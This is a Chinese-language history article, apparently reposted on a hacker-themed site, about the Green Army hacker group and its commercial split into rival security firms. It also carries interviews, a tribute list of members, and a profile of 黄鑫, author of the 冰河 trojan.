<P style="TEXT-INDENT: 2em">　　我国最早一批<A href="http://www.3800hk.com/">黑客</A>大约出现在１９９４年，其<A href="http://www.3800hk.com/">黑客</A>行为持续到１９９９年底。代表性的组织就是ＧＯＯＤＷＥＬＬ（龚蔚）等五人组织的绿色兵团。据称，极盛时期注册会员达到３０００多人，成员遍布全国各地。谢朝霞、彭哥、ＰＰ（彭泉）、天行（陈伟山）、黄鑫是第一代<A href="http://www.3800hk.com/">黑客</A>中的顶级高手。他们的特点是，自己深入研究<A href="http://www.3800hk.com/">网络</A>安全<A href="http://www.3800hk.com/">技术</A>（换一个名称就叫<A href="http://www.3800hk.com/">黑客</A><A href="http://www.3800hk.com/">技术</A>），有自己的理论和产品。现在他们都已经是<A href="http://www.3800hk.com/">网络</A>安全方面的专家了！ </P>
<P style="TEXT-INDENT: 2em">　　“绿色兵团”是中国大陆最大最早的民间<A href="http://www.3800hk.com/">黑客</A>组织之一。创始人goodwell1997年在外网站申请一<A href="http://www.3800hk.com/">免费</A>空间并在国内多处做了镜像站点，当初起名为绿色兵团，原地址”i.am/hack1“。作为最早的中国<A href="http://www.3800hk.com/">黑客</A>组织，绿色兵团成员在短期里成员迅速状大！上海、北京、石家庄等地均由其主要成员分布。同时，其影响力也在网民之中大增，特别是与与网易的几次冲突，使绿色兵团名声大振。　　 1999年1月23日，绿色兵团在上海召开兵团第一次年会。地点为上海延安东路128弄6号(星空<A href="http://www.3800hk.com/">网吧</A>)。1999年7月15日，绿色兵团转轨拥有了自己的<A href="http://www.3800hk.com/">服务</A>器和自己的安全公司：上海绿盟计算机<A href="http://www.3800hk.com/">网络</A>安全<A href="http://www.3800hk.com/">技术</A>有限公司，启用<A href="http://www.3800hk.com/">域名</A>isbase.com开站，公司名同年10月正式注册成功。 </P>
<P style="TEXT-INDENT: 2em">　　2000年3月，中联公司以合作为名，在北京注册公司：北京中联绿盟信息<A href="http://www.3800hk.com/">技术</A>公司，合作期间，两站使用同一标志标志由北京公司设计，上海公司所有成员为老成员，北京公司大多为新招暮成员，上海公司所有的费用、办公场地、办公用品、工作开展等等大多为北京中联绿盟科技提供。2000年7月，北京公司与上海公司因内部原因，双方合作破裂，北京公司启用新<A href="http://www.3800hk.com/">域名</A>nsfocus.com。据说，双方冲突非常强烈，彼此亦对对方不断进行<A href="http://www.3800hk.com/">黑客</A>攻击。8月底，北京公司向法院起诉上海公司，上海公司败诉。10月份，上海公司作价30万左右将公司包括<A href="http://www.3800hk.com/">域名</A>isbase.com转让给北京公司，人员解散。北京公司将isbase.com<A href="http://www.3800hk.com/">域名</A>停用。 </P>
<P style="TEXT-INDENT: 2em">2，“绿色兵团“关闭的原由。 </P>
<P style="TEXT-INDENT: 2em">　　2000年12月，某网站以前<A href="http://www.3800hk.com/">黑客</A>组织绿色兵团发生“兵变”一事为由在网上发布独家报道，引起媒体关注。 </P>
<P style="TEXT-INDENT: 2em">（以下是绿色兵团原主要成员高永安的一段采访记录） </P>
<P style="TEXT-INDENT: 2em">　　这次纠纷其实没什么大不了的，关键是原来绿色兵团上海的以GOODWELL为首的三个人宣称是绿色兵团的创始人和拥有者。我们不否认绿色兵团这四个字是GOODWELL提出来的，因为当时他的个人主页确实是叫这个名字，但是如果因为名字是谁起的就归谁所有，我想也过不大去吧？按这样的道理，名字应该归任天堂公司所有。因为这四个字是原来该公司一个游戏的名字。 </P>
<P style="TEXT-INDENT: 2em">　　我是在去年下半年加如绿色兵团的，当时我们北京部分规模还很小，也就几个人租了一个三居室的房子进行活动。这些北京的后来加入者比较早就发现<A href="http://www.3800hk.com/">网络</A>安全是一个大有可为的天地，更因为我们对<A href="http://www.3800hk.com/">网络</A>安全也有强烈的个人爱好。因此在北京也算了聚集了一批真正的高手。 </P>
<P style="TEXT-INDENT: 2em">　　原来的绿色兵团由于是一个<A href="http://www.3800hk.com/">黑客</A>主页，因此在当时遭到了各虚拟主机提供商的围剿，有一年多时间都陷于停顿状态。因此我们北京的沈总经理(现在中联绿色盟的领导者)专程奔赴上海，意图进行商业化运作，注册了上海绿盟。由于沈不是上海户口，为了避免麻烦，就用了原绿色兵团三人之一的于刚为法人。 </P>
<P style="TEXT-INDENT: 2em">　　我们在北京正式做了一个站点，租了<A href="http://www.3800hk.com/">服务</A>器，这就是后来的isbase.com。但我敢负责任的说，在开站这一年多的时间里，(绿色兵团)上海方面没有对这个站点做过哪怕一个标点的贡献，所有内容全是北京做的。 </P>
<P style="TEXT-INDENT: 2em">　　绿色兵团从无到有到如日中天到商业化运作都是北京部门做出了最大的贡献。我们从未否认过这三个人是概念的提出者和我们的核心成员，待遇上也都是一视同仁。 </P>
<P style="TEXT-INDENT: 2em">　　北京部分在商业化过程中，新组成了一个叫中联绿盟的公司，在英属开曼群岛注册的。是一个海外独资企业，此后就任命于刚为上海分公司经理，并一共拨去27万资金。我们这边由于有一段时间一直在忙于公司的商业运作，对原来的ISBASE的管理就停止了一段时间，但是在今年六月份的时候，我们发现，<A href="http://www.3800hk.com/">域名</A>的管理权已经被上海方面私自转走。 </P>
<P style="TEXT-INDENT: 2em">　　在与上海方面的交涉中，上海方面提出要求原来创始绿色兵团的六个人应该坐在一起开个股东会，来决定公司的法律结构。我没有接受：原来的绿色兵团是个个人主页，而现在的绿色兵团是个国际化的公司，由六个人来决定六十个人的公司的前途显然是不合理的。我当时要求他们把<A href="http://www.3800hk.com/">域名</A>无条件转回去，放弃这种要求，但当即被他们拒绝。 </P>
<P style="TEXT-INDENT: 2em">　　事已至此，我们最后只好做出决定：中联绿盟不再使用ISBASE的<A href="http://www.3800hk.com/">域名</A>，我们认为我们的价值不在<A href="http://www.3800hk.com/">域名</A>而在于我们的人，因此我们后来就取了一个新<A href="http://www.3800hk.com/">域名</A>，弃用了原来的<A href="http://www.3800hk.com/">域名</A>。中联绿盟公司做出决定，把这几个人开除，并向法院起诉原上海公司，要求归还当初所拨27万元的开办经费。 </P>
<P style="TEXT-INDENT: 2em">　　结果我们胜诉，经调解。对方以原来的ISBASE<A href="http://www.3800hk.com/">域名</A>低偿债务。我们接手这个<A href="http://www.3800hk.com/">域名</A>后当即将这个<A href="http://www.3800hk.com/">域名</A>废止。 </P>
<P style="TEXT-INDENT: 2em">　　这件事情本来很简单，但经过某网站编辑在未经过采访的情况下写了一篇文章，讲什么绿盟兵变，吸引了大家的注意力。我们有六十多个员工，现在只不过是开除了三个员工，实际上是很小的一件事。原来的绿色兵团的<A href="http://www.3800hk.com/">黑客</A>高手backend,袁哥等现在都还在北京公司。 </P>
<P style="TEXT-INDENT: 2em">　　我认为这件事情的关键是原来的几个绿色兵团成员提出了与自己贡献不符的过分要求，他们六个人要决定公司整体的股权和期权的分配显然是不合适的。　　 </P>
<P style="TEXT-INDENT: 2em">============================================================= </P>
<P style="TEXT-INDENT: 2em">背景资料： </P>
<P style="TEXT-INDENT: 2em">绿色兵变”爆出惊人内幕 (转摘） </P>
<P style="TEXT-INDENT: 2em">　　12月1日晚大约8点多，在绿色兵团基地（irc.sunnet.org[202.109.72.40]:6667的#isbase频道）发生了大规模的争吵，这是继几次分裂事件以来，绿盟最大规模的内讧。袁哥化名大兔子参与了讨论，上海绿盟的创始人goodwell、coldface等都在场，补天（patching.net）的yagami、坏男孩俱乐部的badboy和本站的一位网管同时在场，见证了整个过程。前后持续约3个小时，会场次序非常混乱，不断有人捣乱。 </P>
<P style="TEXT-INDENT: 2em">　　绿色兵团北京站-<A href="http://www.3800hk.com/">网络</A>力量站长coldface首先指出曾委托阿新发表了一篇关于绿色兵团现状的申明，但是一些媒体未经授权擅自修改申明内容，违反申明原意，并指出此前媒体的一些报道失实，不仅引用上面未经证实的内容，还将绿色兵团基地误写成202.101.6.5:6667的#isbase频道。最后，未得出最终结论，双方不欢而散，记者立即采访了上海绿盟的创始人goodwell，终于揭开了绿色兵团的所谓内讧真相。 </P>
<P style="TEXT-INDENT: 2em">　　原来上海绿盟（简称上绿）在中联绿盟（简称中绿）分道扬镳之后，因故欠了中联绿盟一笔数目不大的款子，被法院判定暂时抵押办公地点和<A href="http://www.3800hk.com/">域名</A>、<A href="http://www.3800hk.com/">服务</A>器，使得绿盟站点停止<A href="http://www.3800hk.com/">服务</A>无法访问。据goodwell介绍，本来他们不会遇到资金周转的问题，只是因为他们中的一个主要成员突然去世（年仅28岁的rocky），使得他们放下了所有的事务。据信，他们的站点将会很快恢复，本站将会继续为大家做追踪报道。 </P>
<P style="TEXT-INDENT: 2em">以下是谈话记录： </P>
<P style="TEXT-INDENT: 2em">皮鲁：你是早期绿盟成员么，当时组建有谁？ </P>
<P style="TEXT-INDENT: 2em">coldface：应该说是绿色兵团，是solo,littlefish,goodwell,dspman,rocky... </P>
<P style="TEXT-INDENT: 2em">皮鲁:过去现在成员都在干什么？这也是大家很关心的问题。 </P>
<P style="TEXT-INDENT: 2em">coldface:呵呵，以前是开绿盟公司，上了中联绿盟的当后，又被赶尽杀绝，rocky死了，别人暂时失业. </P>
<P style="TEXT-INDENT: 2em">皮鲁:rocky死了是怎样去世的，内讧到底是怎么回事？ </P>
<P style="TEXT-INDENT: 2em">coldface:rocky：是出车祸死的，(此处省略）因为他死了以后，大家都忙着他的后事，耽误了很多业务，结果中联出来要钱，所以才出现了现在这个样子。 </P>
<P style="TEXT-INDENT: 2em">皮鲁：(此处省略） </P>
<P style="TEXT-INDENT: 2em">coldface：(此处省略） </P>
<P style="TEXT-INDENT: 2em">皮鲁：中联和上海绿盟都属商业站么？ </P>
<P style="TEXT-INDENT: 2em">coldface：是的，中联以前是上海出来的，但是拿了上海的钱自己做公司，又接受了一些投资，就翻脸不认人了。 </P>
<P style="TEXT-INDENT: 2em">皮鲁：建站的初衷是建商业站么？ </P>
<P style="TEXT-INDENT: 2em">coldface：不是，是利用商业来继续推动组织的发展。 </P>
<P style="TEXT-INDENT: 2em">皮鲁：现在绿盟的状况是大家最想知道的了，你可以简单解释一下么？ </P>
<P style="TEXT-INDENT: 2em">coldface：现在上海绿盟的东西都抵押给了中联，所以站无法开了。 </P>
<P style="TEXT-INDENT: 2em">皮鲁：<A href="http://www.3800hk.com/">网络</A>力量是属你个人还是绿盟？ </P>
<P style="TEXT-INDENT: 2em">coldface：是我个人建立起来的，但是我是想把他建立成为属于大家的非赢利组织，前身是绿色兵团北京站。 </P>
<P style="TEXT-INDENT: 2em">皮鲁：谈谈你吧。。。你一直在<A href="http://www.3800hk.com/">网络</A>公司？ </P>
<P style="TEXT-INDENT: 2em">coldface：是的，在一些<A href="http://www.3800hk.com/">网络</A>公司做与安全无关的事情，因为我把研究安全作为一种享受。 </P>
<P style="TEXT-INDENT: 2em">皮鲁：你对中国<A href="http://www.3800hk.com/">网络</A>安全怎么看？ </P>
<P style="TEXT-INDENT: 2em">coldface：还没到正常发展期，但是国外安全业已经压迫而来了 </P>
<P style="TEXT-INDENT: 2em">皮鲁：<A href="http://www.3800hk.com/">网络</A>力量是想做重组的绿盟还是新的安全<A href="http://www.3800hk.com/">网络</A>站？ </P>
<P style="TEXT-INDENT: 2em">coldface：还没到正常发展期，但是国外安全业已经压迫而来了。 </P>
<P style="TEXT-INDENT: 2em">coldface：<A href="http://www.3800hk.com/">网络</A>力量不是绿色兵团 </P>
<P style="TEXT-INDENT: 2em">皮鲁：那么你的发展方向在哪？ </P>
<P style="TEXT-INDENT: 2em">coldface：我们最终的方向可能是商业机构赞助的非赢利组织，<A href="http://www.3800hk.com/">免费</A>为大众<A href="http://www.3800hk.com/">服务</A>。 </P>
<P style="TEXT-INDENT: 2em">皮鲁：那么绿盟呢，只有中联绿盟了么？ </P>
<P style="TEXT-INDENT: 2em">coldface：绿盟事实上已经是中联的了，但是绿色兵团还是我们的 </P>
<P style="TEXT-INDENT: 2em">皮鲁：绿色兵团现在要重建么？ </P>
<P style="TEXT-INDENT: 2em">coldface：是的 </P>
<P style="TEXT-INDENT: 2em">皮鲁：中联绿盟的实力很强呀，象袁哥。。。还会合作么？ </P>
<P style="TEXT-INDENT: 2em">coldface：合作不期望。。。 </P>
<P style="TEXT-INDENT: 2em">皮鲁：有什么近期规划吗？ </P>
<P style="TEXT-INDENT: 2em">coldface：近期是把绿色兵团稳定下来，然后再图发展。 </P>
<P style="TEXT-INDENT: 2em">皮鲁：稳定在什么方面呢？ </P>
<P style="TEXT-INDENT: 2em">coldface：在组织方面，为大众<A href="http://www.3800hk.com/">服务</A></P>
<P style="TEXT-INDENT: 2em">皮鲁：<A href="http://www.3800hk.com/">技术</A>方面呢，有合作或联盟意向么？ </P>
<P style="TEXT-INDENT: 2em">coldface：是的，我们将和一些媒体合作，推出实物杂志 </P>
<P style="TEXT-INDENT: 2em">皮鲁：带商业性质的么？ </P>
<P style="TEXT-INDENT: 2em">coldface：不，至少现在还不行。 </P>
<P style="TEXT-INDENT: 2em">皮鲁：天极网在北京召开的“<A href="http://www.3800hk.com/">黑客</A>”大会纪实你参加了么？ </P>
<P style="TEXT-INDENT: 2em">coldface：没有，其实那时我公司在天极网楼下 </P>
<P style="TEXT-INDENT: 2em">皮鲁：当中有中联绿盟的人，你接触了么？ </P>
<P style="TEXT-INDENT: 2em">coldface：我没有去 </P>
<P style="TEXT-INDENT: 2em">皮鲁：中国鹰派这次的成立你怎样看？ </P>
<P style="TEXT-INDENT: 2em">coldface：我还没听到消息啊 </P>
<P style="TEXT-INDENT: 2em">皮鲁：<A href="http://www.3800hk.com/">黑客</A>会议当时有北京绿盟的高手，指的是谁呀？ </P>
<P style="TEXT-INDENT: 2em">coldface：不清楚，没见到 </P>
<P style="TEXT-INDENT: 2em">皮鲁：上海绿盟、中联绿盟、北京绿盟是三家解体？上绿的状况如何？ </P>
<P style="TEXT-INDENT: 2em">coldface：中联绿盟和北京绿盟是同一家，在中联没得到投资以前他就叫北京绿盟，上海绿盟被这一搞，基本没有了。 </P>
<P style="TEXT-INDENT: 2em">皮鲁：上绿的成员倾向那边，现在怎样？ </P>
<P style="TEXT-INDENT: 2em">coldface：上海绿盟的人才是绿色兵团的主力 </P>
<P style="TEXT-INDENT: 2em">皮鲁：那么按你说，现在中联绿盟的成员呢？ </P>
<P style="TEXT-INDENT: 2em">coldface：他们基本不是绿色兵团的，是中联招募的。 </P>
<P style="TEXT-INDENT: 2em">皮鲁：近期你们会有大的举措么，如关心台海局势。。。 </P>
<P style="TEXT-INDENT: 2em">coldface：呵呵，<A href="http://www.3800hk.com/">技术</A>不被政治利用才可以正常发展！ </P>
<P style="TEXT-INDENT: 2em">皮鲁：政治应该说是<A href="http://www.3800hk.com/">技术</A>的基础吧。 </P>
<P style="TEXT-INDENT: 2em">coldface：呵呵，现在而言，发展确实是建立在政治稳固的基础上，(此处省略） </P>
<P style="TEXT-INDENT: 2em">皮鲁：爱国热情是不被<A href="http://www.3800hk.com/">技术</A>左右的。 </P>
<P style="TEXT-INDENT: 2em">coldface：那是当然，而是<A href="http://www.3800hk.com/">技术</A>通常被一些所谓的爱国热情所左右的。 </P>
<P style="TEXT-INDENT: 2em">皮鲁：呵呵。。同感。。。 </P>
<P style="TEXT-INDENT: 2em">coldface：呵呵，有一个清醒的头脑总是好的 </P>
<P style="TEXT-INDENT: 2em">皮鲁：<A href="http://www.3800hk.com/">网络</A>安全是绿色兵团的<A href="http://www.3800hk.com/">技术</A>最终目的？ </P>
<P style="TEXT-INDENT: 2em">coldface：是的，知道攻击才知道防守 </P>
<P style="TEXT-INDENT: 2em">皮鲁：呵呵。。多此一问。你认为现在好的中国<A href="http://www.3800hk.com/">黑客</A>高手有么？ </P>
<P style="TEXT-INDENT: 2em">coldface：有，隐藏在<A href="http://www.3800hk.com/">网络</A>管理员里 </P>
<P style="TEXT-INDENT: 2em">皮鲁：今天也谈了很多，谢谢你了，我可以公开我们的谈话么，你有补充么 ？ </P>
<P style="TEXT-INDENT: 2em">(此处省略） </P>
<P style="TEXT-INDENT: 2em">皮鲁：呵呵。。。明天见报（我的站） </P>
<P style="TEXT-INDENT: 2em">第五章：中国”绿色兵团“代表人物介绍 </P>
<P style="TEXT-INDENT: 2em">（本文引用GOODWELL写的绿色兵团的战友录） </P>
<P style="TEXT-INDENT: 2em">Rocky:请允许我把这个人的名字放在第一位，并致以最沉痛的悼念，早期的绿色兵团核心成员，美国国防部的web site上曾留下过他为祖国的呐喊，绿色兵团早期的文章由他翻译。我依然记得四年前rocky第一次进入我的linux ,当时他的激动和喜悦，然而今天他却永远的离开了我们，走的这么突然。我会记得你，大家会记得你，直到永远、永远，我的朋友--Rocky。 </P>
<P style="TEXT-INDENT: 2em">Dspman(HeHe):绿色兵团核心成员，为人和气，讲义气，做事情大大咧咧。但是Unix基础相当过硬。 </P>
<P style="TEXT-INDENT: 2em">Solo:绿色兵团核心成员，美丽的solo，精通<A href="http://www.3800hk.com/">数据</A>库，做事比较重感情，曾第一个提出SQL查询语句的严重<A href="http://www.3800hk.com/">漏洞</A>。 </P>
<P style="TEXT-INDENT: 2em">LittleFish(小鱼儿）:绿色兵团核心成员，要是上天再给我一次机会的话，我还是愿意和他做朋友。因为我爱他。果断的性格，冷俊的言语是一个天生的<A href="http://www.3800hk.com/">黑客</A>。当年我曾对他说，我们要做一个中国最大的<A href="http://www.3800hk.com/">网络</A>安全组织，鱼儿回答我说：“不！，我们要做亚洲最大的。”这句话我永远记得，我会去努力的，即使一事无成。 </P>
<P style="TEXT-INDENT: 2em">Blackeye:绿色兵团核心成员，是个具有商业头脑的人，曾为绿色兵团商业化做过很多的付出和努力，中国<A href="http://www.3800hk.com/">黑客</A>走到商业化道路和这个名字分不开。 </P>
<P style="TEXT-INDENT: 2em">笛亚哥:是一个很老很老的朋友，也许很多人已经遗忘了这个名字，但是我一直在寻找他，曾编写当时来说比较实用的文章（绿色兵团<A href="http://www.3800hk.com/">黑客</A>教材）。 </P>
<P style="TEXT-INDENT: 2em">冰人:一个人彻底的消失很难尤其是这样出名的一个人物，早期的中国<A href="http://www.3800hk.com/">黑客</A>没有不知道这个名字的，但是他的确做到了，彻底的从<A href="http://www.3800hk.com/">网络</A>这个世界消失了。 </P>
<P style="TEXT-INDENT: 2em">jianyuf:几年前是绿色兵团<A href="http://www.3800hk.com/">聊天</A>室的常客，大家一起学习一起进步，对<A href="http://www.3800hk.com/">技术</A>他完全不保留。 </P>
<P style="TEXT-INDENT: 2em">中国鹰派:绿色兵团早期成员，擅长加密破解曾参加过第一次的绿色兵团年会。为组织出谋化策是个铁杆成员现在中国鹰派发展迅速，成员分布中国各地，和他的努力分不开。 </P>
<P style="TEXT-INDENT: 2em">Frankie:辰光站长，说到深圳辰光无人不晓，是中国出名的一个安全站点。 </P>
<P style="TEXT-INDENT: 2em">Iamin:97年绿色兵团站点第一万个访客，当时他的站点和绿色兵团是两个主要的安全大站。其安全站点<A href="http://www.3800hk.com/">黑客</A>之家也是当初最出名的站点。 </P>
<P style="TEXT-INDENT: 2em">袁哥:我非常敬佩的一个程序员，非常实干，热于助人，<A href="http://www.3800hk.com/">技术</A>相当过硬，而且看程序有耐心。不管发生什么，他都是我敬佩的一个程序员。 </P>
<P style="TEXT-INDENT: 2em">Adam:chinaasp的安全版版主，相识很偶然，很好客和热心，就是喜欢开开小玩笑,借我的那本书不知道啥年头可以还我。 </P>
<P style="TEXT-INDENT: 2em">Davidchen(backend):翻译过很多<A href="http://www.3800hk.com/">技术</A>文章，很多经典的安全文章出自他的手。 </P>
<P style="TEXT-INDENT: 2em">Cloudsky:清华bbs斑竹之一，写过很多好文章。 </P>
<P style="TEXT-INDENT: 2em">CK:一个广洲的年轻小伙子，绿色兵团成员，非常好学。 </P>
<P style="TEXT-INDENT: 2em">PP:一个老朋友，为中国<A href="http://www.3800hk.com/">网络</A>安全做过很多贡献，喜欢在<A href="http://www.3800hk.com/">网络</A>上打报不平。 </P>
<P style="TEXT-INDENT: 2em">ColdFace:绿色兵团分站<A href="http://www.3800hk.com/">网络</A>力量站长，脾气比较大，但是为组织做过很多事情，纯ORG的强烈拥护者。 </P>
<P style="TEXT-INDENT: 2em">小榕:从乱刀到流光，用过的人都知道这个名字，他是一个专门开发安全工具的程序员。 </P>
<P style="TEXT-INDENT: 2em">Zer9:我非常喜欢的一个朋友，气量很大，代表作品，代理猎手高度分析等。 </P>
<P style="TEXT-INDENT: 2em">天行:天行软件的作者，应该不用介绍了，要是你不知道就去用一下他的软件。 </P>
<P style="TEXT-INDENT: 2em">LOG:绿色兵团早期成员，曾参加过第一次绿色兵团年会，话语不多，但是为人很诚恳，我一直感到欠疚，他从外地赶来开会我没有招呼好他。 </P>
<P style="TEXT-INDENT: 2em">雨馨:千万别以为这是个女孩，不过他的cn105没有人不知道，以前是绿色兵团的常客，<A href="http://www.3800hk.com/">技术</A>提高很快。 </P>
<P style="TEXT-INDENT: 2em">LoGon(doorless):一个非常谦虚和好学的人，值得交往的朋友。 </P>
<P style="TEXT-INDENT: 2em">liwrml:绿色兵团分站，麒麟<A href="http://www.3800hk.com/">网络</A>安全小组的站长，兵团铁杆支持者。 </P>
<P style="TEXT-INDENT: 2em">Chener:需要什么软件，需要什么地址去问他，觉得他就象活的<A href="http://www.3800hk.com/">网络</A>词典。 </P>
<P style="TEXT-INDENT: 2em">大鹰:补天的得力干将，很有互助精神，你问他什么问题他总是尽量回答你。 </P>
<P style="TEXT-INDENT: 2em">shutgun:一个真正热爱<A href="http://www.3800hk.com/">网络</A>安全的<A href="http://www.3800hk.com/">技术</A>人员，不为名利，不为金钱。 </P>
<P style="TEXT-INDENT: 2em">WoWo:患难之中见真情，得人滴水之恩当涌泉相报。 </P>
<P style="TEXT-INDENT: 2em">仙剑:仙剑乐园有一大批的中国安全爱好者，是中国最大的一个电话破解站点。 </P>
<P style="TEXT-INDENT: 2em">Casper:是也很好的朋友，他有很cool的外型，谦虚和严谨，对<A href="http://www.3800hk.com/">技术</A>从不保留，是个真正热爱安全的<A href="http://www.3800hk.com/">技术</A>人员。 </P>
<P style="TEXT-INDENT: 2em">椰子:写过不少好文章，看事情比教成熟。 </P>
<P style="TEXT-INDENT: 2em">WhoamI:热心，乐于助人，只是有个坏习惯，千万别在他喝醉的时候去和他讨论<A href="http://www.3800hk.com/">技术</A>。 </P>
<P style="TEXT-INDENT: 2em">**illy:中国每个安全站点的角落都能看到他的灌水贴，绿色兵团常客 </P>
<P style="TEXT-INDENT: 2em">weiyangsheng:绿色兵团铁杆支持者，比较低调。 </P>
<P style="TEXT-INDENT: 2em">BadBoy:中国红客的领袖人物，知识面教广也是兵团的支持者。 </P>
<P style="TEXT-INDENT: 2em">柳咏:绿色兵团的拥护者，其实他比很多人都要强，可是他总是很谦虚，说自己懂的很少，而且不太说废话，只和别人探讨<A href="http://www.3800hk.com/">技术</A>。 </P>
<P style="TEXT-INDENT: 2em">小小龙女:绿色兵团的很多文章有他翻译，精通linux。 </P>
<P style="TEXT-INDENT: 2em">阿飞(remix):绿色兵团的成员，老说自己是垃圾，废话是挺多的，不过人不错，为兵团做了很事情。 </P>
<P style="TEXT-INDENT: 2em">五月玫瑰:绿色兵团的成员，虽然没有说过一句话，没见过一次面，而且几乎不看到他发言， </P>
<P style="TEXT-INDENT: 2em">直到有一天他发来的信，把自己发现的微软输入法的新<A href="http://www.3800hk.com/">漏洞</A>无私的告诉了我们，永远都会感谢他对兵团的支持。 </P>
<P style="TEXT-INDENT: 2em">Ghost_happy:他的桌面实在是叫人流口水，不行你去问他要一张截图看看（win2k + vm +FreeBsd)。 </P>
<P style="TEXT-INDENT: 2em">GoodWell:请允许我把自己的名字写在最后，正是因为大家的努力，才会有一个美丽的光环照在我的头上，我真的、真的愿意做大家成功道路上的一颗垫脚石，一颗永远不需要闪光的垫脚石，我愿意看着你们一个一个的走向成功的道路，同时也希望不久的将来能把你的名字写上去，去为龙的传人争光。 </P>
<P style="TEXT-INDENT: 2em">第六章：木马教父冰河 </P>
<P style="TEXT-INDENT: 2em">网名： glacier ，木马冰河 </P>
<P style="TEXT-INDENT: 2em">真名：黄鑫 </P>
<P style="TEXT-INDENT: 2em">毕业院校：西安电子科技大学 </P>
<P style="TEXT-INDENT: 2em">工作：<A href="http://www.3800hk.com/">网络</A>安全网站“安全焦点” </P>
<P style="TEXT-INDENT: 2em">性别：男 </P>
<P style="TEXT-INDENT: 2em">年纪：28 </P>
<P style="TEXT-INDENT: 2em">现居住：广西 </P>
<P style="TEXT-INDENT: 2em">网站：xfocus.net </P>
<P style="TEXT-INDENT: 2em">婚姻：刚结婚不久 </P>
<P style="TEXT-INDENT: 2em">============================================================= </P>
<P style="TEXT-INDENT: 2em">　　大家都知道微软网站被<A href="http://www.3800hk.com/">黑客</A>入侵是因为木马软件的缘故。这个以特洛伊战争中使用的木马正大摇大摆地杀入互联网的领地，而这个软件的编写者就是被我们称为木马教父的黄鑫。99年，木马虽然已经在<A href="http://www.3800hk.com/">黑客</A>中间遍布使用，但多数为国外的BO和BUS等木马，对于一些刚接触<A href="http://www.3800hk.com/">黑客</A>的生手来说，理解这些软件的使用方法和熟练使用这些软件无疑成为了“通往<A href="http://www.3800hk.com/">黑客</A>道路”上的最大的难题，此外这些木马多数能够被杀毒软件擒获，使得国内的<A href="http://www.3800hk.com/">黑客</A>多数不愿意去用木马。正当国内大多数<A href="http://www.3800hk.com/">黑客</A>们苦苦寻觅新的国外木马时，一款中国人自己的编写的木马悄悄诞生了，它就是冰河。冰河在诞生之初凭借着国产化和暂时无杀毒软件能防杀的特点迅速地成为了<A href="http://www.3800hk.com/">黑客</A>们使用最广泛的木马。冰河本不该归属于木马的行列的，按照冰河作者黄鑫的话说，他编写冰河完全是靠自己的兴趣和网友的鼓励，最初只是想编写一个方便自己的远程控制软件，不曾想竟然编成了一个中国流传使用最广泛的<A href="http://www.3800hk.com/">黑客</A>软件。 </P>
<P style="TEXT-INDENT: 2em">　　在1.2版本冰河发布以后，国内的<A href="http://www.3800hk.com/">黑客</A>们大多认同了冰河，把冰河作为了木马软件的首选。经过多方的支持和鼓励，特别是来自中国国内的<A href="http://www.3800hk.com/">黑客</A>们的支持使得黄鑫又努力开发出冰河2.0。2.0新增加了许多以前没有的功能和特性，特别是它在使用的过程中比1.2的更加方便更加的隐蔽好，所以2.0的出现使得冰河立即成为了人尽皆知的木马类<A href="http://www.3800hk.com/">黑客</A>软件。冰河良好的隐蔽性和使用简单的特点让国内许多想成为<A href="http://www.3800hk.com/">黑客</A>，但又不懂<A href="http://www.3800hk.com/">黑客</A><A href="http://www.3800hk.com/">技术</A>的人深深地过了一把<A href="http://www.3800hk.com/">黑客</A>瘾，利用冰河入侵个人系统计算机后，他们便能够利用冰河得到他们想得到的一切。现今很多出名的<A href="http://www.3800hk.com/">黑客</A>都是利用冰河迈向通往<A href="http://www.3800hk.com/">黑客</A>道路的第一步的。黄鑫的冰河让很多人体会了做<A href="http://www.3800hk.com/">黑客</A>的快感，更让很多人了解了<A href="http://www.3800hk.com/">网络</A>安全的重要性。 </P>
<P style="TEXT-INDENT: 2em">　　其实就<A href="http://www.3800hk.com/">黑客</A>的定性而言，身为一个<A href="http://www.3800hk.com/">数据</A>库开发程序员的黄鑫或许根本算不上一个<A href="http://www.3800hk.com/">黑客</A>，他从来没有黑过任何一个网站，甚至在开发测试冰河的时候也是利用自己和朋友的计算机来检验。然而我们不能否认冰河的强大功能，特别是22版的冰河开发出后，它可以让任何一个菜鸟顷刻之间变成一个极否有攻击力的<A href="http://www.3800hk.com/">黑客</A>。这一切理由都让黄鑫成为了中国<A href="http://www.3800hk.com/">黑客</A>，特别是初级<A href="http://www.3800hk.com/">黑客</A>们的精神领袖。我们几乎能从每一个想了解<A href="http://www.3800hk.com/">黑客</A>的朋友的计算机里找到冰河的身影。在中国千千万万个连接在互联网上的计算机中，几乎每一百台里就埋藏着一个冰河，我们也不难发现在大大小小的<A href="http://www.3800hk.com/">网吧</A>里时常能够听到那些初级<A href="http://www.3800hk.com/">黑客</A>利用冰河搜寻出冰河的受害者后发出的兴奋高呼。冰河，已经成为了中国木马的代名词。冰河已经成为了互联网恐怖的象征。 </P>
<P style="TEXT-INDENT: 2em">　　现如今黄鑫已经停止了对冰河后续版本的开发，作为程序员的良知让他不得不面对冰河作为一个<A href="http://www.3800hk.com/">黑客</A>工具的危害性。没有人想成为人民的公敌，正是这些良知让黄鑫放弃了冰河的后期开发。作为一个无意间带动了中国互联<A href="http://www.3800hk.com/">网络</A>安全发展的人，他的名字应向他的软件一样，永远值得我们去回忆，虽然他带给我们的只有那个经典的木马程序，但这依然不丝毫影响我们对他的崇敬。冰河在打开我们电脑大门的同时也打开了我们对<A href="http://www.3800hk.com/">网络</A>安全认识的大门。 </P>
<P style="TEXT-INDENT: 2em">　　黄鑫还是西安电子科技大学的学生时，为了给自己的电脑杀毒，黄鑫一头栽进<A href="http://www.3800hk.com/">网络</A>安全的世界里再也没有出来。1999年上半年，黄鑫写出了冰河木马软件。随着冰河木马在网上的迅速传播，黄鑫的名字被越来越多的人熟悉。 </P>
<P style="TEXT-INDENT: 2em">　　冰河木马一经问世就颇受争议，争议的核心是它既可当作植入被攻击端的木马，也可作为正当的<A href="http://www.3800hk.com/">网络</A>远程管理利器。黄鑫自己从未用它黑过任何一台别人的电脑，如同一个纯粹的剑客武痴，他关注的只是<A href="http://www.3800hk.com/">技术</A>本身。 </P>
<P style="TEXT-INDENT: 2em">　　在那场中美<A href="http://www.3800hk.com/">黑客</A>大战中，许多人都用了黄鑫写的程序去攻击。黄鑫始终认为，对真正的<A href="http://www.3800hk.com/">黑客</A>来说，破坏并不是目的，<A href="http://www.3800hk.com/">技术</A>研究的最终目的是在自由与开放的环境中发挥每个人的专长。 </P>
